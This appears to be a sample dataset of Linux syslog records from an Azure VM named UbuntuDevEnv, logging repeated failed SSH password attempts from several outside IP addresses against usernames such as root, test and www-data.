+8891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:19,UbuntuDevEnv,2019-06-25 22:05:18,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 26921:11: Bye Bye [preauth],39912,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,26921,,
+8892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:24,UbuntuDevEnv,2019-06-25 22:05:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224  user=test,39931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,165.22.96.2,,0,
+8893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:26,UbuntuDevEnv,2019-06-25 22:05:25,auth,UbuntuDevEnv,info,Failed password for test from 165.22.96.224 port 44690 ssh2,39931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,44690,,
+8894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:26,UbuntuDevEnv,2019-06-25 22:05:25,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 44690:11: Bye Bye [preauth],39931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,44690,,
+8895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:05:26,UbuntuDevEnv,2019-06-25 22:05:25,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 165.22.96.224 port 44690 [preauth],39931,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,165.22.96.2,44690,,
+8896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:00,UbuntuDevEnv,2019-06-25 22:05:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=132.232.40.86  user=www-data,40044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,132.232.40.8,,0,
+8897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:02,UbuntuDevEnv,2019-06-25 22:06:01,auth,UbuntuDevEnv,info,Failed password for www-data from 132.232.40.86 port 43208 ssh2,40044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,43208,,
+8898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:02,UbuntuDevEnv,2019-06-25 22:06:01,auth,UbuntuDevEnv,info,Received disconnect from 132.232.40.86 port 43208:11: Bye Bye [preauth],40044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,43208,,
+8899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:02,UbuntuDevEnv,2019-06-25 22:06:01,auth,UbuntuDevEnv,info,Disconnected from authenticating user www-data 132.232.40.86 port 43208 [preauth],40044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,www,132.232.40.8,43208,,
+8900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:45,UbuntuDevEnv,2019-06-25 22:06:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,40228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:45,UbuntuDevEnv,2019-06-25 22:06:45,auth,UbuntuDevEnv,info,Invalid user pian from 212.156.136.114 port 37893,40228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pian,212.156.136.1,37893,,
+8902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:45,UbuntuDevEnv,2019-06-25 22:06:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:47,UbuntuDevEnv,2019-06-25 22:06:47,auth,UbuntuDevEnv,info,Failed password for invalid user pian from 212.156.136.114 port 37893 ssh2,40228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pian,212.156.136.1,37893,,
+8904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:47,UbuntuDevEnv,2019-06-25 22:06:47,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 37893:11: Bye Bye [preauth],40228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,37893,,
+8905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:06:47,UbuntuDevEnv,2019-06-25 22:06:47,auth,UbuntuDevEnv,info,Disconnected from invalid user pian 212.156.136.114 port 37893 [preauth],40228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pian,212.156.136.1,37893,,
+8906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:04,UbuntuDevEnv,2019-06-25 22:07:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224  user=root,40288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,165.22.96.2,,0,
+8907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:07,UbuntuDevEnv,2019-06-25 22:07:06,auth,UbuntuDevEnv,info,Failed password for root from 165.22.96.224 port 34536 ssh2,40288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,34536,,
+8908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:07,UbuntuDevEnv,2019-06-25 22:07:06,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 34536:11: Bye Bye [preauth],40288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,34536,,
+8909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:07,UbuntuDevEnv,2019-06-25 22:07:06,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 165.22.96.224 port 34536 [preauth],40288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,165.22.96.2,34536,,
+8910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:47,UbuntuDevEnv,2019-06-25 22:07:46,auth,UbuntuDevEnv,info,Invalid user vmi from 132.232.40.86 port 34512,40445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmi,132.232.40.8,34512,,
+8911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:47,UbuntuDevEnv,2019-06-25 22:07:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=132.232.40.86,40445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,132.232.40.8,,0,
+8912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:47,UbuntuDevEnv,2019-06-25 22:07:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:48,UbuntuDevEnv,2019-06-25 22:07:48,auth,UbuntuDevEnv,info,Failed password for invalid user vmi from 132.232.40.86 port 34512 ssh2,40445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmi,132.232.40.8,34512,,
+8914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:49,UbuntuDevEnv,2019-06-25 22:07:48,auth,UbuntuDevEnv,info,Disconnected from invalid user vmi 132.232.40.86 port 34512 [preauth],40445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmi,132.232.40.8,34512,,
+8915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:07:49,UbuntuDevEnv,2019-06-25 22:07:48,auth,UbuntuDevEnv,info,Received disconnect from 132.232.40.86 port 34512:11: Bye Bye [preauth],40445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,34512,,
+8916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:18,UbuntuDevEnv,2019-06-25 22:08:17,auth,UbuntuDevEnv,info,Invalid user sales1 from 212.156.136.114 port 12575,40558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales1,212.156.136.1,12575,,
+8917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:18,UbuntuDevEnv,2019-06-25 22:08:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,40558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:18,UbuntuDevEnv,2019-06-25 22:08:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:20,UbuntuDevEnv,2019-06-25 22:08:19,auth,UbuntuDevEnv,info,Failed password for invalid user sales1 from 212.156.136.114 port 12575 ssh2,40558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales1,212.156.136.1,12575,,
+8920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:20,UbuntuDevEnv,2019-06-25 22:08:20,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 12575:11: Bye Bye [preauth],40558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,12575,,
+8921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:20,UbuntuDevEnv,2019-06-25 22:08:20,auth,UbuntuDevEnv,info,Disconnected from invalid user sales1 212.156.136.114 port 12575 [preauth],40558,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales1,212.156.136.1,12575,,
+8922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:50,UbuntuDevEnv,2019-06-25 22:08:49,auth,UbuntuDevEnv,info,Invalid user avendoria from 165.22.96.224 port 53020,40665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avendoria,165.22.96.2,53020,,
+8923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:50,UbuntuDevEnv,2019-06-25 22:08:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,40665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:50,UbuntuDevEnv,2019-06-25 22:08:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:52,UbuntuDevEnv,2019-06-25 22:08:51,auth,UbuntuDevEnv,info,Failed password for invalid user avendoria from 165.22.96.224 port 53020 ssh2,40665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avendoria,165.22.96.2,53020,,
+8926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:52,UbuntuDevEnv,2019-06-25 22:08:52,auth,UbuntuDevEnv,info,Disconnected from invalid user avendoria 165.22.96.224 port 53020 [preauth],40665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,avendoria,165.22.96.2,53020,,
+8927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:08:52,UbuntuDevEnv,2019-06-25 22:08:52,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 53020:11: Bye Bye [preauth],40665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,53020,,
+8928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:38,UbuntuDevEnv,2019-06-25 22:09:38,auth,UbuntuDevEnv,info,Invalid user annulee from 132.232.40.86 port 54242,40838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,annulee,132.232.40.8,54242,,
+8929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:38,UbuntuDevEnv,2019-06-25 22:09:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=132.232.40.86,40838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,132.232.40.8,,0,
+8930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:38,UbuntuDevEnv,2019-06-25 22:09:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:40,UbuntuDevEnv,2019-06-25 22:09:40,auth,UbuntuDevEnv,info,Failed password for invalid user annulee from 132.232.40.86 port 54242 ssh2,40838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,annulee,132.232.40.8,54242,,
+8932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:41,UbuntuDevEnv,2019-06-25 22:09:40,auth,UbuntuDevEnv,info,Received disconnect from 132.232.40.86 port 54242:11: Bye Bye [preauth],40838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,132.232.40.8,54242,,
+8933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:41,UbuntuDevEnv,2019-06-25 22:09:40,auth,UbuntuDevEnv,info,Disconnected from invalid user annulee 132.232.40.86 port 54242 [preauth],40838,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,annulee,132.232.40.8,54242,,
+8934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:49,UbuntuDevEnv,2019-06-25 22:09:48,auth,UbuntuDevEnv,info,Invalid user gopi from 212.156.136.114 port 27087,40879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gopi,212.156.136.1,27087,,
+8935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:49,UbuntuDevEnv,2019-06-25 22:09:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:49,UbuntuDevEnv,2019-06-25 22:09:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,40879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:51,UbuntuDevEnv,2019-06-25 22:09:51,auth,UbuntuDevEnv,info,Failed password for invalid user gopi from 212.156.136.114 port 27087 ssh2,40879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gopi,212.156.136.1,27087,,
+8938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:51,UbuntuDevEnv,2019-06-25 22:09:51,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 27087:11: Bye Bye [preauth],40879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,27087,,
+8939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:09:51,UbuntuDevEnv,2019-06-25 22:09:51,auth,UbuntuDevEnv,info,Disconnected from invalid user gopi 212.156.136.114 port 27087 [preauth],40879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gopi,212.156.136.1,27087,,
+8940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:10:35,UbuntuDevEnv,2019-06-25 22:10:34,auth,UbuntuDevEnv,info,Invalid user nmwangi from 165.22.96.224 port 43380,41044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmwangi,165.22.96.2,43380,,
+8941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:10:35,UbuntuDevEnv,2019-06-25 22:10:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:10:35,UbuntuDevEnv,2019-06-25 22:10:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,41044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:10:37,UbuntuDevEnv,2019-06-25 22:10:36,auth,UbuntuDevEnv,info,Failed password for invalid user nmwangi from 165.22.96.224 port 43380 ssh2,41044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmwangi,165.22.96.2,43380,,
+8944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:10:37,UbuntuDevEnv,2019-06-25 22:10:36,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 43380:11: Bye Bye [preauth],41044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,43380,,
+8945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:10:37,UbuntuDevEnv,2019-06-25 22:10:36,auth,UbuntuDevEnv,info,Disconnected from invalid user nmwangi 165.22.96.224 port 43380 [preauth],41044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmwangi,165.22.96.2,43380,,
+8946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:17,UbuntuDevEnv,2019-06-25 22:11:17,auth,UbuntuDevEnv,info,Invalid user shei from 212.156.136.114 port 21414,41197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shei,212.156.136.1,21414,,
+8947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:17,UbuntuDevEnv,2019-06-25 22:11:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:17,UbuntuDevEnv,2019-06-25 22:11:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,41197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+8949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:19,UbuntuDevEnv,2019-06-25 22:11:19,auth,UbuntuDevEnv,info,Failed password for invalid user shei from 212.156.136.114 port 21414 ssh2,41197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shei,212.156.136.1,21414,,
+8950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:11:19,UbuntuDevEnv,2019-06-25 22:11:19,auth,UbuntuDevEnv,info,Disconnected from invalid user shei 212.156.136.114 port 21414 [preauth],41197,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shei,212.156.136.1,21414,,
